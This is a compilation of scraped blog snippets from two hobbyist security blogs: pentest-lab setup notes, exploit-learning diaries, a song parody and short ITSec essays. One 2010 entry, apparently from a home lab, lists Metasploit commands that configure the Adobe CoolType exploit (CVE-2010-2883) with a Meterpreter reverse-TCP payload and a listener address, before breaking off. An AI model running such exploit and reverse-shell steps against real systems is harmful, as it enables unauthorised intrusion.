pentest-n00b.blogspot.com
Pentest N00b
http://pentest-n00b.blogspot.com/2009/08/well-past-few-weeks-have-been-little.html
Monday, 24 August 2009. Well the past few weeks have been a little busy @ work so have not had much time to further my knowledge. I have managed to read about and try to understand how exploits are found and how the exploiter alters the application code to enable an exploit to run in an application, this was mainly utilising the buffer overflow method. There are some nice tutorials here @ Peter Van Eeckhouttes Blog. Http:/ www.corelan.be:8800/. Catch you all soon. Subscribe to: Post Comments (Atom).
pentest-n00b.blogspot.com
Pentest N00b: Re Think On Pentest Lab - We Go Totally Open Source
http://pentest-n00b.blogspot.com/2010/07/re-think-on-pentest-lab-we-go-totally.html
Thursday, 8 July 2010. Re Think On Pentest Lab - We Go Totally Open Source. Having played around with my previous Virtual Pentest Lab and found it more than up to the job, Citrix's Xenserver is after all the best Virtualisation system around and for not very much money or free if you don't need the fancy extra's - I have a 2 node Xenserver system with an OPenFiler SAN at the office without the essentials licence and it makes life sooooo easy. Give it a try and watch this space for future developments.
pentest-n00b.blogspot.com
Pentest N00b: Welcome To The Pentest N00b
http://pentest-n00b.blogspot.com/2009/08/welcome-to-pentest-n00b.html
Friday, 7 August 2009. Welcome To The Pentest N00b. This is my first post on my new blog, hopefully this is were I'll attempt to map my progress as a Pentester N00b. I've already started on the road to enlightenment, I've bought some books, I got a netbook with backtrack 4 on it and I've been following some respected blogs, listening to podcasts and reading on security websites - I'll elaborate on the above in future posts. Hope this is gonna be a pleasant journey through the security universe.
pentest-n00b.blogspot.com
Pentest N00b: September 2010
http://pentest-n00b.blogspot.com/2010_09_01_archive.html
Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...
pentest-n00b.blogspot.com
Pentest N00b: Upcoming Pentest Lab
http://pentest-n00b.blogspot.com/2010/01/upcoming-pentest-lab.html
Tuesday, 5 January 2010. Having read the latest blog posts from Syn Junkie, I have decided to setup my own pentest lab. Following Syn's recommendations I have decided to to lean on virtualization to provide the basis for my lab. I too have 3 laptops, 1 x Lenovo Thinkpad Z61p running Citrix Xenserver 5.5.0. 1 x Lenovo Thinkpad X60s running Ubuntu 9.10 and KVM. 1 x ASUS EEEPC 1000HE Hackbook running Backtrack 4. I look forward to publishing my exploits with my new Pentesting lab. View my complete profile.
secmoose.blogspot.com
tl;dr security
http://secmoose.blogspot.com/2012/03/shpantzer-made-me-feel-all-left-out.html
I don't know anything. But, I'm able to learn. Tuesday, March 20, 2012. Shpantzer made me feel all left out. Here's my security song parody. Small rack and a huge back-end. With apologies to Cake [short skirt, long jacket]). I want a site with a dev like a diamond. I want a site made by the best. I want a site with sanitized input. And code as tight as oubliettes. I want a site with secure certificates. Or better: a system that can't be hacked. It's taking in my currency. It's processing my checks. Dbg s...
secmoose.blogspot.com
tl;dr security: March 2012
http://secmoose.blogspot.com/2012_03_01_archive.html
I don't know anything. But, I'm able to learn. Tuesday, March 20, 2012. Shpantzer made me feel all left out. Here's my security song parody. Small rack and a huge back-end. With apologies to Cake [short skirt, long jacket]). I want a site with a dev like a diamond. I want a site made by the best. I want a site with sanitized input. And code as tight as oubliettes. I want a site with secure certificates. Or better: a system that can't be hacked. It's taking in my currency. It's processing my checks. Dbg s...
secmoose.blogspot.com
tl;dr security: Goats and ITSec
http://secmoose.blogspot.com/2011/07/goats-and-itsec.html
I don't know anything. But, I'm able to learn. Friday, July 15, 2011. A local health insurance provider recently launched an ad campaign using goats to confront the highly contentious issue of health care reform. The idea is that each participant in the health care system (including health care providers, patients, lawyers, and insurers) all have a different scapegoat for the rising cost of health care. The ads are amusing, and you can see most of them on youtube: http:/ www.youtube.com/results? Meanwhil...
secmoose.blogspot.com
tl;dr security: May 2011
http://secmoose.blogspot.com/2011_05_01_archive.html
I don't know anything. But, I'm able to learn. Friday, May 27, 2011. Lessons Learned for ITSec from Swearing. Swear words are only words, really. If you use them the same way you would use any other verb, noun, or adjective, they have no distinct power. Their rarity (and the way people are trained to respond to them) is what gives them their power to offend. You shock them by saying something they haven't heard in common conversation. So, how does this apply to Information Security? Think about the words...
SOCIAL ENGAGEMENT